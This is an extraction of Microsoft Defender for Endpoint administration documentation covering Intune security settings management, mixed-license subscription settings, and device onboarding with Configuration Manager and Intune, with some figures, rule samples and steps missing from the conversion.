Windows Server 2019 (with KB5006744 )
Windows Server 2022 (with KB5006745 )
Security settings management doesn't work on and isn't supported with the following
devices:
Non-persistent desktops, like Virtual Desktop Infrastructure (VDI) clients or Azure

Virtual Desktops.
Domain Controllers
） Important
In some cases, Domain Controllers that are run a down level server Operating
system (2012 R2 or 2016) can unintentionally be managed by Microsoft Defender
for Endpoint. In order to ensure that this doesn’t happen in your environment, we
recommend making sure your domain controllers are neither tagged “MDE-
Management” or managed by MDE.
Licensing and subscriptions

To use security settings management, you need:
A subscription that grants licenses for Microsoft Defender for Endpoint, like
Microsoft 365, or a standalone license for only Microsoft Defender for Endpoint. A
subscription that grants Microsoft Defender for Endpoint licenses also grants your
tenant access to the Endpoint security node of the Microsoft Intune admin center.
７ Note
Exception: If you have access to Microsoft Defender for Endpoint only

through Microsoft Defender for servers (part of Microsoft Defender for Cloud,
formerly Azure Security Center), the security settings management
functionality isn't available. You will need to have at least one Microsoft
Defender for Endpoint (user) subscription license active.
The Endpoint security node is where you configure and deploy policies to manage
Microsoft Defender for Endpoint for your devices and monitor device status.
For current information about options, see Minimum requirements for Microsoft
Architecture
The following diagram is a conceptual representation of the Microsoft Defender for
Endpoint security configuration management solution.
1. Devices onboard to Microsoft Defender for Endpoint.

2. Devices communicate with Intune. This communication enables Microsoft Intune
to distribute policies that are targeted to the devices when they check in.
3. A registration is established for each device in Microsoft Entra ID:
If a device was previously fully registered, like a Hybrid Join device, the
existing registration is used.
For devices that haven't been registered, a synthetic device identity is created
in Microsoft Entra ID to enable the device to retrieve policies. When a device
with a synthetic registration has a full Microsoft Entra registration created for
it, the synthetic registration is removed and the devices management
continues on uninterrupted by using the full registration.
4. Defender for Endpoint reports the status of the policy back to Microsoft Intune.
） Important
Security settings management uses a synthetic registration for devices that don’t
fully register in Microsoft Entra ID, and drops the Microsoft Entra hybrid join
prerequisite. With this change, Windows devices that previously had enrollment
errors will begin onboarding to Defender and then receive and process the security
settings management policies.
To filter for devices that were unable to enroll due to failing to meet the Microsoft
Entra hybrid join prerequisite, navigate to the Devices list in the Microsoft Defender
portal, and filter by enrollment status. Because these devices are not fully
registered, their device attributes show MDM = Intune and Join Type = Blank.
These devices will now enroll with security settings management using the
synthetic registration.
After enrolling these devices appear in the device lists for Microsoft Defender,
Microsoft Intune, and Microsoft Entra portals. While the devices won’t be fully
registered with Microsoft Entra, their synthetic registration counts as one device
object.
What to expect in the Microsoft Defender portal

You can use the Microsoft Defender XDR Device inventory to confirm a device is using
the security settings management capability in Defender for Endpoint, by reviewing the
devices status in the Managed by column. The Managed by information is also available
on the devices side-panel or device page. Managed by should consistently indicate that
its managed by MDE.
You can also confirm a device has enrolled in security settings management successfully
by confirming that the device-side panel or device page display MDE Enrollment status
as Success.

If the MDE Enrollment status doesn’t display Success, make sure you’re looking at a
device that was updated and is in scope for security settings management. (You
configure the scope on the Enforcement scope page while configuring security settings
management.)
What to expect in the Microsoft Intune admin center

In the Microsoft Intune admin center, go to the All Devices page. Devices enrolled with
security settings management appear here as in the Defender portal. In the admin
center, the devices Managed by field should display MDE.
 Tip
In June 2023, security settings management began using synthetic registration for
devices that don’t fully register in Microsoft Entra. With this change, devices that
previously had enrollment errors will begin onboarding to Defender and then
receive and process the security settings management policies.
What to expect in the Microsoft Azure portal

On the All devices page In the Microsoft Azure portal, you can view device details.
To ensure that all devices enrolled in Defender for Endpoint security settings
management receive policies, we recommend creating a dynamic Microsoft Entra group
based on the devices’ OS Type. With a dynamic group, devices that are managed by
Defender for Endpoint are automatically added to the group without requiring admins
to perform other tasks, like creating a new policy.
） Important
From July 2023 to September 25, 2023, security settings management ran an opt-in
public preview that introduced new behavior for devices that were managed and
enrolled to the scenario. Starting on September 25, 2023, the public preview
behavior became generally available and now applies to all tenants that use
security settings management.
If you used security settings management prior to September 25, 2023, and did not
join the opt-in public preview that ran from July 2023 to September 25, 2023,
review your Microsoft Entra groups that rely on system labels to make changes that
will identify new devices you manage with security settings management. This is
because prior to September 25, 2023, devices not managed through the opt-in
public preview would use the following system labels (tags) of MDEManaged and
MDEJoined to identify managed devices. These two system labels are no longer
supported and are no longer added to devices that enroll.
Use the following guidance for your Dynamic groups:
(Recommended) When targeting policy, use dynamic groups based on the device
platform by using the deviceOSType attribute (Windows, Windows Server, macOS,
Linux) to ensure policy continues to be delivered for devices that change
management types, for example during MDM enrollment.
If necessary, dynamic groups containing exclusively devices that are managed by
Defender for Endpoint can be targeted by defining a dynamic group using the
managementType attribute MicrosoftSense. Use of this attribute targets all devices
that are managed by Defender for Endpoint via the security settings management
functionality, and devices remain in this group only while managed by Defender
for Endpoint.
Also, when configuring security settings management, if you intend to manage entire
OS platform fleets using Microsoft Defender for Endpoint, by selecting all devices
instead of tagged devices in the Microsoft Defender for Endpoint Enforcement Scope
page, understand that any synthetic registrations are counted against Microsoft Entra ID
quotas the same as full registrations.
Which solution should I use?

Microsoft Intune includes several methods and policy types to manage the
configuration of Defender for Endpoint on devices. The following table identifies the
Intune policies and profiles that support deployment to devices managed by Defender
for Endpoint security settings management and can help you identify if this solution is
right for your needs.
When you deploy an endpoint security policy that’s supported for both Defender for
Endpoint security settings management and Microsoft Intune, a single instance of that
policy can be processed by:
Devices supported through security settings management (Microsoft Defender)

Devices that are managed by either Intune or Configuration Manager.
Profiles for the Windows 10 and later platform aren't supported for devices managed by
Following profiles are supported for each device type:
Linux
The following policy types support the Linux platform.
ﾉ Expand table
Endpoint security Profile Defender for Endpoint security Microsoft
policy settings management Intune
Antivirus Microsoft Defender

Antivirus

Antivirus exclusions
Endpoint detection Endpoint detection

and response and response
macOS
The following policy types support the macOS platform.
ﾉ Expand table
Endpoint security Profile Defender for Endpoint security Microsoft

policy settings management Intune

Antivirus

Endpoint detection Endpoint detection

and response and response
Windows 10, Windows 11, and Windows Server

To support use with Microsoft Defender security settings management, your policies for
Windows devices must use the Windows 10, Windows 11, and Windows Server platform.
Each profile for the Windows 10, Windows 11, and Windows Server platform can apply to
devices that are managed by Intune and to devices that are managed by security
ﾉ Expand table
Endpoint security Profile Defender for Endpoint Microsoft

policy security settings management Intune
Antivirus Defender Update

controls
Endpoint security Profile Defender for Endpoint Microsoft
policy security settings management Intune

Antivirus

Antivirus Windows Security Note 1

Experience
Attack Surface Attack Surface

Reduction Reduction Rules
Endpoint detection Endpoint detection and

and response response
Firewall Firewall
Firewall Firewall Rules
1 - The Windows Security Experience profile is available in the Defender portal but only
applies to devices managed by Intune. It isn't supported for devices managed by
Microsoft Defender security settings management.
Endpoint security policies are discrete groups of settings intended for use by security
admins who focus on protecting devices in your organization. The following are
descriptions of the policies that support security settings management:
Antivirus policies manage the security configurations found in Microsoft Defender

for Endpoint. See antivirus policy for endpoint security.
７ Note
While endpoints do not require a restart in order to apply modified settings or

new policies, we are aware of an issue where the AllowOnAccessProtection and
DisableLocalAdminMerge settings might at times require end users to restart
their devices for these settings to update. We are currently investigating this
issue in order to provide a resolution.
Attack surface reduction (ASR) policies focus on minimizing the places where your
organization is vulnerable to cyberthreats and attacks. With security settings
management, ASR rules apply to devices that run Windows 10, Windows 11, and
Windows Server.
For current guidance about which settings apply to the different platforms and
versions, see ASR rules supported operating systems in the Windows Threat
protection documentation.
 Tip
To help keep supported endpoints up to date, consider using the modern

unified solution for Windows Server 2012 R2 and 2016.
Also see:
Overview of attack surface reduction in the Windows Threat protection
documentation.
Attack surface reduction policy for endpoint security, in the Intune
documentation.
Endpoint detection and response (EDR) policies manage the Defender for
Endpoint capabilities that provide advanced attack detections that are near real-
time and actionable. Based on EDR configurations, security analysts can prioritize
alerts effectively, gain visibility into the full scope of a breach, and take response
actions to remediate threats. See endpoint detection and response policy for
endpoint security.
Firewall policies focus on the Defender firewall on your devices. See firewall policy
for endpoint security.
Firewall Rules configure granular rules for Firewalls, including specific ports,
protocols, applications, and networks. See firewall policy for endpoint security.
Configure your tenant to support Defender for

Endpoint security settings management
To support security settings management through the Microsoft Intune admin center,
you must enable communication between them from within each console.
The following sections guide you through that process.
Configure Microsoft Defender for Endpoint

In Microsoft Defender for Endpoint portal, as a security administrator:
1. Sign in to Microsoft Defender portal and go to Settings > Endpoints >
Configuration Management > Enforcement Scope and enable the platforms for
７ Note
If you have the Manage security settings in Security Center permission in the
Microsoft Defender for Endpoint portal, and are simultaneously enabled to
view devices from all Device Groups (no role-based access control limits on
your user permissions), you can also perform this action.
2. Initially, we recommend testing the feature for each platform by selecting the
platforms option for On tagged devices, and then tagging the devices with the
MDE-Management tag.
） Important
Use of Microsoft Defender for Endpoint’s Dynamic tag capability to tag

devices with MDE-Management isn’t currently supported with security settings
management. Devices tagged through this capability won’t successfully enroll.
This issue remains under investigation.
 Tip
Use the proper device tags to test and validate your rollout on a small number
of devices. When selecting the All devices, any device that falls into the scope
configured will automatically be enrolled.
3. Configure the feature for Microsoft Defender for Cloud onboarded devices and
Configuration Manager authority settings to fit your organization's needs:
 Tip
To ensure your Microsoft Defender for Endpoint portal users have consistent
permissions across portals, if not already provided, request that your IT
administrator grant them the Microsoft Intune Endpoint Security Manager
built-in RBAC role.
Configure Intune
In the Microsoft Intune admin center, your account need permissions equal to Endpoint
Security Manager built-in Role based access control (RBAC) role.
1. Sign in to the Microsoft Intune admin center .
2. Select Endpoint security > Microsoft Defender for Endpoint, and set Allow
Microsoft Defender for Endpoint to enforce Endpoint Security Configurations to
On.

When you set this option to On, all devices in the platform scope for Microsoft
Defender for Endpoint that aren't managed by Microsoft Intune qualify to onboard
to Microsoft Defender for Endpoint.
Onboard devices to Microsoft Defender for

Endpoint
Microsoft Defender for Endpoint supports several options to onboard devices. For
current guidance, see Onboard to Microsoft Defender for Endpoint in the Defender for
Endpoint documentation.
Coexistence with Microsoft Configuration

Manager
In some environments it might be desired to use security settings management with
devices managed by Configuration Manager. If you use both, you need to control policy
through a single channel. Use of more than one channel creates the opportunity for
conflicts and undesired results.
To support this, configure the Manage Security settings using Configuration Manager
toggle to Off. Sign in to the Microsoft Defender portal and go to Settings >
Endpoints > Configuration Management > Enforcement Scope:

Create Microsoft Entra Groups

After devices onboard to Defender for Endpoint, you'll need to create device groups to
support deployment of policy for Microsoft Defender for Endpoint. To identify devices
that have enrolled with Microsoft Defender for Endpoint but aren't managed by Intune
or Configuration Manager:
1. Sign in to Microsoft Intune admin center .
2. Go to Devices > All devices, and then select the column Managed by to sort the
view of devices. Devices that onboard to Microsoft Defender for Endpoint but
aren't managed by Intune display Microsoft Defender for Endpoint in the Managed
by column. These devices can receive policies for security settings management.
Devices that onboard to Microsoft Defender for Endpoint and have registered but
aren't managed by Intune display Microsoft Defender for Endpoint in the
Managed by column. These are the devices that can receive policy for security
management for Microsoft Defender for Endpoint.
Starting on September 25, 2023, devices that use security management for
Microsoft Defender for Endpoint can no longer be identified by using the following
system labels:
MDEJoined - A now deprecated tag that was previously added to devices

that were joined to the directory as part of this scenario.
MDEManaged - A now deprecated tag that was previously added to devices
that actively used the security management scenario. This tag is removed
from the device if Defender for Endpoint stops managing the security
configuration.
Instead of using system labels, you can use the management type attribute, and
configure it to MicrosoftSense.
You can create groups for these devices in Microsoft Entra or from within the Microsoft
Intune admin center. When creating groups, you can use the OS value for a device if
you're deploying policies to devices running Windows Server vs devices that run a client
version of Windows:
Windows 10 and Windows 11 - The deviceOSType or OS displays as Windows
Windows Server - The deviceOSType or OS displays as Windows Server
Linux Device - The deviceOSType or OS displays as Linux
Sample Intune Dynamic Groups with Rule Syntax

Windows Workstations:
Windows Servers:
Linux Devices:

） Important
In May 2023, deviceOSType updated to distinguish between Windows clients and

Windows Servers.
Custom scripts and Microsoft Entra dynamic device groups created before this
change that specify rules that reference only Windows might exclude Windows
Servers when used with the Security Management for Microsoft Defender for
Endpoint solution. For example:
If you have a rule that uses the equals or not equals operator to identify
Windows, this change will affect your rule. That is because previously both
Windows and Windows Server were reported as Windows. To continue to
include both, you must update the rule to also reference Windows Server.
If you have a rule that use the contains or like operator to specify Windows,
then the rule won’t be affected by this change. These operators can find both
Windows and Windows Server.
 Tip
Users that are delegated the ability to manage endpoint security settings may not
have the ability to implement tenant-wide configurations in Microsoft Intune.
Check with your Intune administrator for more information on roles and
permissions in your organization.
Deploy policy
After creating one or more Microsoft Entra groups that contain devices managed by
Microsoft Defender for Endpoint, you can create and deploy the following policies for
security settings management to those groups. The policies and profiles available vary
by platform.
For the list of policy and profile combinations supported for security settings
management, see the chart in Which solution should I use? earlier in this article.
 Tip
Avoid deploying multiple policies that manage the same setting to a device.
Microsoft Intune supports deploying multiple instances of each endpoint security

policy type to the same device, with each policy instance being received by the
device separately. Therefore, a device might receive separate configurations for the
same setting from different policies, which results in a conflict. Some settings (like
Antivirus Exclusions) will merge on the client and apply successfully.
1. Sign in to the Microsoft Intune admin center .
2. Go to Endpoint security, select the type of policy you want to configure, and then
select Create Policy.
3. For the policy, select the Platform and the Profile that you want to deploy. For a list
of the Platforms and Profiles that support security settings management, see the
chart in Which solution should I use? earlier in this article.
７ Note
The supported profiles apply to devices that communicate through Mobile

Device Management (MDM) with Microsoft Intune and devices that
communicate using the Microsoft Defender for Endpoint client.
Ensure you review your targeting and groups as necessary.
4. Select Create.
5. On the Basics page, enter a name and description for the profile, then choose
Next.
6. On the Configuration settings page, select the settings you want to manage with
this profile.
To learn more about a setting, expand its information dialog and select the Learn
more link to view the on-line Configuration Service Provider (CSP) documentation
or related details, for that setting.
When you're done configuring settings, select Next.
7. On the Assignments page, select the Microsoft Entra groups that receive this
profile. For more information on assigning profiles, see Assign user and device
profiles.
Select Next to continue.
 Tip
Assignment filters are not supported for devices managed by security

Only Device Objects are applicable for Microsoft Defender for Endpoint
management. Targeting users is not supported.
Policies configured will apply to both Microsoft Intune and Microsoft
Defender for Endpoint clients.
8. Complete the policy creation process and then on the Review + create page,
select Create. The new profile is displayed in the list when you select the policy
type for the profile you created.
9. Wait for the policy to be assigned and view a success indication that policy was
applied.
10. You can validate that settings have applied locally on the client by using the Get-
MpPreference command utility.
Monitor status
Status and reports for policies that target devices in this channel are available from the
policy node under Endpoint security in the Microsoft Intune admin center.
Drill in to the policy type and then select the policy to view its status. You can view the
list of platforms, policy types, and profiles that support security settings management in
the table in Which solution should I use, earlier in this article.
When you select a policy, you can view information about the device check-in status,
and can select:
View report - View a list of devices that received the policy. You can select a device
to drill in and see its per-setting status. You can then select a setting to view more
information about it, including other policies that manage that same setting, which
could be a source of conflict.
Per setting status - View the settings that are managed by the policy, and a count
of success, errors, or conflicts for each setting.
Frequently asked questions and considerations
Device check-in frequency

Devices managed by this capability check-in with Microsoft Intune every 90 minutes to
update policy.
You can manually sync a device on-demand from the Microsoft Defender portal . Sign-
in to the portal and go to Devices. Select a device that is managed by Microsoft
Defender for Endpoint, and then select the Policy sync button:
The Policy sync button only appears for devices that are successfully managed by
Devices protected by Tamper Protection

If a device has Tamper Protection turned on, it isn't possible to edit the values of Tamper
Protected settings without disabling Tamper Protection first.
Assignment Filters and security settings management

Assignment filters aren't supported for devices communicating through the Microsoft
Defender for Endpoint channel. While assignment filters can be added to a policy that
could target these devices, the devices ignore assignment filters. For assignment filter
support, the device must be enrolled in to Microsoft Intune.
Deleting and removing devices

You can delete devices that use this flow using one of two methods:
From within the Microsoft Intune admin center go to Devices > All devices,
select a device that displays either MDEJoined or MDEManaged in the Managed by
column, and then select Delete.
You can also remove devices from the scope of Configuration Management in the
Security Center.
Once a device is removed from either location, that change propagates to the other
service.
Unable to enable the Security Management for Microsoft

Defender for Endpoint workload in Endpoint Security
Most initial provisioning flows are typically completed by an Administrator of both
services (such as a Global Administrator). There are some scenarios where Role-based
Administration is used to customize the permissions of administrators. Today, individuals
who are delegated the Endpoint Security Manager role might not have the necessary
permissions to enable this feature.
Microsoft Entra joined devices

Devices that are joined to Active Directory use their existing infrastructure to complete
the Microsoft Entra hybrid join process.
Unsupported security settings

The following security settings are pending deprecation. The Defender for Endpoint
security settings management flow doesn't support these settings:
Expedite telemetry reporting frequency (under Endpoint Detection and Response)

AllowIntrusionPreventionSystem (under Antivirus)
Tamper Protection (under Windows Security Experience). This setting is not
pending deprecation, but is currently not supported.
Use of security settings management on domain
controllers
Because a Microsoft Entra ID trust is required, domain controllers aren't currently
supported. We're looking at ways to add this support.
） Important
In some cases, Domain Controllers that are run a down level server Operating
system (2012 R2 or 2016) can unintentionally be managed by Microsoft Defender
for Endpoint. In order to ensure that this doesn’t happen in your environment, we
recommend making sure your domain controllers are neither tagged “MDE-
Management” or managed by MDE.
Server Core installation

Security settings management doesn't support Server core installations due to Server
core platform limitations.
PowerShell restrict mode

Security settings management doesn't work for a device that has PowerShell
LanguageMode configured with ConstrainedLanguage mode enabled . For more
information, see about_Language_Modes in the PowerShell documentation.
Managing security through MDE if you were previously

using a 3rd party security tool
If you previously had a third-party security tool on the machine and are now managing
it with MDE, you may see some impact on MDE’s capability to manage Security settings
in rare cases. In such cases, as a troubleshooting measure, uninstall and reinstall the
latest version of MDE on your machine.
Next steps
Monitor Defender for Endpoint in Intune
Manage endpoint security policies in Microsoft Defender for Endpoint in the
Defender documentation.
Feedback

Manage Microsoft Defender for
Endpoint subscription settings across
client devices
Article • 01/02/2024
In Defender for Endpoint, a mixed-licensing scenario is a situation in which an

organization is using a mix of Defender for Endpoint Plan 1 and Plan 2 licenses. The
following table describes examples of mixed-licensing scenarios:
ﾉ Expand table
Scenario Description
Mixed tenant Use different sets of capabilities for groups of users and their devices. Examples
include:
- Defender for Endpoint Plan 1 and Defender for Endpoint Plan 2
- Microsoft 365 E3 and Microsoft 365 E5
Mixed trial Try a premium level subscription for some users. Examples include:
- Defender for Endpoint Plan 1 (purchased for all users), and Defender for
Endpoint Plan 2 (a trial subscription has been started for some users)
- Microsoft 365 E3 (purchased for all users), and Microsoft 365 E5 (a trial
subscription has been started for some users)
Phased Upgrade user licenses in phases. Examples include:

upgrades - Moving groups of users from Defender for Endpoint Plan 1 to Plan 2
- Moving groups of users from Microsoft 365 E3 to E5
Until recently, mixed-licensing scenarios weren't supported; in cases of multiple

subscriptions, the highest functional subscription would take precedence for your
tenant. Now, you can manage your subscription settings to accommodate mixed
licensing scenarios across client devices. These capabilities enable you to:
Set your tenant to mixed mode and tag devices to determine which client devices
will receive features and capabilities from each plan (we call this option mixed
mode); OR,
Use the features and capabilities from one plan across all your client devices.
You can also use a newly added license usage report to track status.
７ Note
If you're using Microsoft Defender for Business and you want to switch to Defender
for Endpoint Plan 2, see Change your endpoint security subscription.
Use mixed mode
Set your tenant to mixed mode and tag

devices
） Important
Mixed-mode settings apply to client endpoints only. Tagging server

devices won't change their subscription state. All server devices running
Windows Server or Linux should have appropriate licenses, such as
Defender for Servers. See Options for onboarding servers.
Make sure to follow the procedures in this article to try mixed-license
scenarios in your environment. Assigning user licenses in the Microsoft
365 admin center (https://admin.microsoft.com ) doesn't set your
tenant to mixed mode.
You should have active trial or paid licenses for both Defender for
Endpoint Plan 1 and Plan 2.
To access license information, you must have one of the following roles
assigned in Microsoft Entra ID:
Global Admin
Security Admin
License Admin + MDE Admin
1. As an admin, go to the Microsoft Defender portal

(https://security.microsoft.com ) and sign in.
2. Go to Settings > Endpoints > Licenses. Your usage report opens and displays
information about your organization's Defender for Endpoint licenses.
3. Under Subscription state, select Manage subscription settings.
７ Note
If you don't see Manage subscription settings, at least one of the
following conditions is true:
You have Defender for Endpoint Plan 1 or Plan 2 (but not both); or
Mixed-license capabilities haven't rolled out to your tenant yet.
4. A Subscription settings flyout opens. Choose the option to use Defender for
Endpoint Plan 1 and Plan 2. (No changes will occur until devices are tagged as
per the next step.)
5. Tag the devices that should receive either Defender for Endpoint Plan 1 or
Plan 2 capabilities. You can choose to tag your devices manually or by using a
dynamic rule. Learn more about device tagging.
ﾉ Expand table
Method Details
Tag devices To tag devices manually, create a tag called License MDE P1
manually and apply it to devices. To get help with this step, see Create
and manage device tags.
Note that devices that are tagged with the License MDE P1 tag
using the registry key method will not receive downgraded
functionality. If you want to tag devices by using the registry
key method, use a dynamic rule instead of manual tagging.
Tag devices Dynamic rule functionality is new for mixed-license scenarios! It

automatically by allows you to apply a dynamic and granular level of control over
using a dynamic rule how you manage devices.
To use a dynamic rule, you specify a set of criteria based on

device name, domain, operating system platform, and/or
device tags. Devices that meet the specified criteria will receive
the Defender for Endpoint Plan 1 or Plan 2 capabilities
according to your rule.
As you define your criteria, you can use the following condition
operators:
- Equals / Not equals
- Starts with
- Contains / Does not contain
For Device name, you can use freeform text.
For Domain, select from a list of domains.

Method Details
For OS platform, select from a list of operating systems.
For Tag, use the freeform text option. Type the tag value that
corresponds to the devices that should receive either Defender
for Endpoint Plan 1 or Plan 2 capabilities. See the example in
More details about device tagging.
Device tags are visible in the Device inventory view and in the Defender for
Endpoint APIs.
７ Note
Dynamically added Defender for Endpoint P1 tags are not currently

filterable in the Device inventory view.
6. Save your rule and wait for up to three (3) hours for tags to be applied. Then,
proceed to Validate that a device is receiving only Defender for Endpoint Plan
1 capabilities.
More details about device tagging

As described in Tech Community blog: How to use tagging effectively , device
tagging provides you with granular control over devices. With device tags, you can:
Display certain devices to individual users in the Microsoft Defender portal so

that they see only the devices they're responsible for.
Include or exclude devices from specific security policies.
Determine which devices should receive Defender for Endpoint Plan 1 or Plan
2 capabilities.
For example, suppose that you want to use a tag called VIP for all the devices that
should receive Defender for Endpoint Plan 2 capabilities. Here's what you would do:
1. Create a device tag called VIP , and apply it to all the devices that should
receive Defender for Endpoint Plan 2 capabilities. Use one of the following
methods to create your device tag:
Add and manage device tags using the Microsoft Defender portal.
Add device tags by setting a registry key value.
Add or remove machine tags by using the Defender for Endpoint API.
Add device tags by creating a custom profile in Microsoft Intune.
2. Set up a dynamic rule using the condition operator Tag Does not contain VIP .
In this case, all devices that do not have the VIP tag will receive the License
MDE P1 tag and Defender for Endpoint Plan 1 capabilities.
Validate that a device is receiving only

Defender for Endpoint Plan 1 capabilities
After you have assigned Defender for Endpoint Plan 1 capabilities to some or all devices,
you can verify that an individual device is receiving those capabilities.
1. In the Microsoft Defender portal (https://security.microsoft.com ), go to Assets >

Devices.
2. Select a device that is tagged with License MDE P1 . You should see that Defender
for Endpoint Plan 1 is assigned to the device.
７ Note
Devices that are assigned Defender for Endpoint Plan 1 capabilities don't have any
vulnerabilities or security recommendations listed.
Review license usage

The license usage report is estimated based on sign-in activities on the device. Defender
for Endpoint Plan 2 licenses are per user, and each user can have up to five concurrent,
onboarded devices. To learn more about license terms, see Microsoft Licensing .
To reduce management overhead, there's no requirement for device-to-user mapping

and assignment. Instead, the license report provides a utilization estimation that is
calculated based on device usage seen across your organization. It might take up to one
day for your usage report to reflect the active usage of your devices.
） Important
To access license information, you must have one of the following roles assigned in
Microsoft Entra ID:
Security Admin
Global Admin
License Admin + MDE Admin
2. Choose Settings > Endpoints > Licenses.
3. Review your available and assigned licenses. The calculation is based on detected
users who have accessed devices that are onboarded to Defender for Endpoint.
More resources
Licensing and product terms for Microsoft 365 subscriptions .
How to contact support for Defender for Endpoint.
Get started with Microsoft Security (trial offers)
Microsoft Defender for Business (endpoint protection for small and medium-sized
businesses)
 Tip
Feedback

Onboarding using Microsoft
Article • 11/15/2023
Applies to:

This article acts as an example onboarding method.
In the Planning article, there were several methods provided to onboard devices to the
service. This article covers the co-management architecture.

Diagram of environment architectures
While Defender for Endpoint supports onboarding of various endpoints and tools, this
article doesn't cover them. For information on general onboarding using other
supported deployment tools and methods, see Onboarding overview.
This article guides users in:

Step 1: Onboarding Windows devices to the service
Step 2: Configuring Defender for Endpoint capabilities
This onboarding guidance walks you through the following basic steps that you need to
take when using Microsoft Configuration Manager:
Creating a collection in Microsoft Configuration Manager

Configuring Microsoft Defender for Endpoint capabilities using Microsoft
７ Note
Only Windows devices are covered in this example deployment.
Step 1: Onboard Windows devices using

Collection creation
Onboarding using tools such as Group policy or manual method doesn't install any
agent on the system.
Within the Microsoft Configuration Manager, console the onboarding process will be
management point.
Follow the steps below to onboard endpoints using Microsoft Configuration Manager.
1. In Microsoft Configuration Manager console, navigate to Assets and Compliance

> Overview > Device Collections.

2. Right select Device Collection and select Create Device Collection.


5. Select Next on the Direct Membership Wizard and select on Edit Query
Statement.

number, operator as is greater than or equal to and value 14393 and select on OK.

9. Select Next.

After completing this task, you now have a device collection with all the Windows
endpoints in the environment.
Step 2: Configure Microsoft Defender for

Endpoint capabilities
This section guides you in configuring the following capabilities using Microsoft
Configuration Manager on Windows devices:

Windows 10 and Windows 11

From within the Microsoft Defender portal it's possible to download the .onboarding
policy that can be used to create the policy in System Center Configuration Manager
and deploy that policy to Windows 10 and Windows 11 devices.
1. From a Microsoft Defender portal , select Settings and then Onboarding .

2. Under Deployment method, select the supported version of Microsoft
3. Select Download package.
4. Save the package to an accessible location.
5. In Microsoft Configuration Manager, navigate to: Assets and Compliance >

Overview > Endpoint Protection > Microsoft Defender ATP Policies.
6. Right-click Microsoft Defender ATP Policies and select Create Microsoft Defender
ATP Policy.

7. Enter the name and description, verify Onboarding is selected, then select Next.
8. Select Browse.
9. Navigate to the location of the downloaded file from step 4 above.
10. Select Next.
11. Configure the Agent with the appropriate samples (None or All file types).

12. Select the appropriate telemetry (Normal or Expedited) then select Next.

13. Verify the configuration, then select Next.
14. Select Close when the Wizard completes.
15. In the Microsoft Configuration Manager console, right-click the Defender for
Endpoint policy you created and select Deploy.
16. On the right panel, select the previously created collection and select OK.

Previous versions of Windows Client (Windows 7 and Windows 8.1)
Follow the steps below to identify the Defender for Endpoint Workspace ID and
Workspace Key that will be required for the onboarding of previous versions of
Windows.
1. From a Microsoft Defender portal , select Settings > Endpoints > Onboarding
(under Device Management).
2. Under operating system, choose Windows 7 SP1 and 8.1.
3. Copy the Workspace ID and Workspace Key and save them. They'll be used later
in the process.
4. Install the Microsoft Monitoring Agent (MMA).

MMA is currently (as of January 2019) supported on the following Windows
Operating Systems:
Server SKUs: Windows Server 2008 SP1 or Newer

Client SKUs: Windows 7 SP1 and later
The MMA agent needs to be installed on Windows devices. To install the agent,
some systems need to download the Update for customer experience and
diagnostic telemetry in order to collect the data with MMA. These system
versions include but may not be limited to:
Windows 8.1
Windows 7
Windows Server 2016
Specifically, for Windows 7 SP1, the following patches must be installed:
Install KB4074598
Install either .NET Framework 4.5 (or later) or KB3154518 . Do not install
both on the same system.
5. If you're using a proxy to connect to the Internet see the Configure proxy settings
section.
Once completed, you should see onboarded endpoints in the portal within an hour.
Next generation protection

Microsoft Defender Antivirus is a built-in anti-malware solution that provides next
generation protection for desktops, portable computers, and servers.

Compliance > Overview > Endpoint Protection > Antimalware Polices and
choose Create Antimalware Policy.

2. Select Scheduled scans, Scan settings, Default actions, Real-time protection,

Exclusion settings, Advanced, Threat overrides, Cloud Protection Service and
Security intelligence updates and choose OK.

In certain industries or some select enterprise customers might have specific needs
on how Antivirus is configured.
Quick scan versus full scan and custom scan
For more information, see Windows Security configuration framework.









3. Right-click on the newly created anti-malware policy and select Deploy.


4. Target the new anti-malware policy to your Windows collection and select OK.
After completing this task, you now have successfully configured Microsoft Defender
Antivirus.
The attack surface reduction pillar of Defender for Endpoint includes the feature set that
is available under Exploit Guard. Attack surface reduction rules, Controlled Folder
Access, Network Protection, and Exploit Protection.
All these features provide a test mode and a block mode. In test mode, there's no end-
user impact. All it does is collect other telemetry and make it available in the Microsoft
Defender portal. The goal with a deployment is to step-by-step move security controls
into block mode.
To set attack surface reduction rules in test mode:

Compliance > Overview > Endpoint Protection > Windows Defender Exploit
Guard and choose Create Exploit Guard Policy.
2. Select Attack Surface Reduction.
3. Set rules to Audit and select Next.


4. Confirm the new Exploit Guard policy by selecting Next.


5. Once the policy is created select Close.


6. Right-click on the newly created policy and choose Deploy.

7. Target the policy to the newly created Windows collection and select OK.
After completing this task, you now have successfully configured attack surface
reduction rules in test mode.
Below are more steps to verify whether attack surface reduction rules are correctly
applied to endpoints. (This may take few minutes)
1. From a web browser, go to Microsoft Defender XDR .
2. Select Configuration management from left side menu.
3. Select Go to attack surface management in the Attack surface management panel.


4. Select Configuration tab in Attack surface reduction rules reports. It shows attack
surface reduction rules configuration overview and attack surface reduction rules
status on each device.
5. Select each device shows configuration details of attack surface reduction rules.

See Optimize attack surface reduction rule deployment and detections for more details.
Set Network Protection rules in test mode

Guard and choose Create Exploit Guard Policy.

2. Select Network protection.
3. Set the setting to Audit and select Next.


4. Confirm the new Exploit Guard Policy by selecting Next.


5. Once the policy is created select on Close.



7. Select the policy to the newly created Windows collection and choose OK.
After completing this task, you now have successfully configured Network Protection in
test mode.
To set Controlled Folder Access rules in test mode

Guard and then choose Create Exploit Guard Policy.

2. Select Controlled folder access.
3. Set the configuration to Audit and select Next.


4. Confirm the new Exploit Guard Policy by selecting Next.


5. Once the policy is created select on Close.



7. Target the policy to the newly created Windows collection and select OK.
You have now successfully configured Controlled folder access in test mode.
Related article
 Tip
Feedback

Article • 02/22/2024
Applies to:

This article acts as an example onboarding method.
In the Planning article, there were several methods provided to onboard devices to the
service. This article covers the cloud-native architecture.

Diagram of environment architectures
While Defender for Endpoint supports onboarding of various endpoints and tools, this
article doesn't cover them. For information on general onboarding using other
supported deployment tools and methods, see Onboarding overview.
The Microsoft Intune family of products is a solution platform that unifies several
services. It includes Microsoft Intune and Microsoft Configuration Manager.
This article guides users in:

Step 1: Onboarding devices to the service by creating a group in Microsoft Intune
to assign configurations on
Step 2: Configuring Defender for Endpoint capabilities using Microsoft Intune
This onboarding guidance walks you through the following basic steps that you need to
take when using Microsoft Intune:
Identifying target devices or users

Creating a Microsoft Entra group (User or Device)
Creating a Configuration Profile
In Microsoft Intune, we guide you in creating a separate policy for each
capability.
Resources
Here are the links you need for the rest of the process:
Intune admin center

Intune Security baselines
For more information about Microsoft Intune, go to Microsoft Intune securely manages
identities, manages apps, and manages devices.
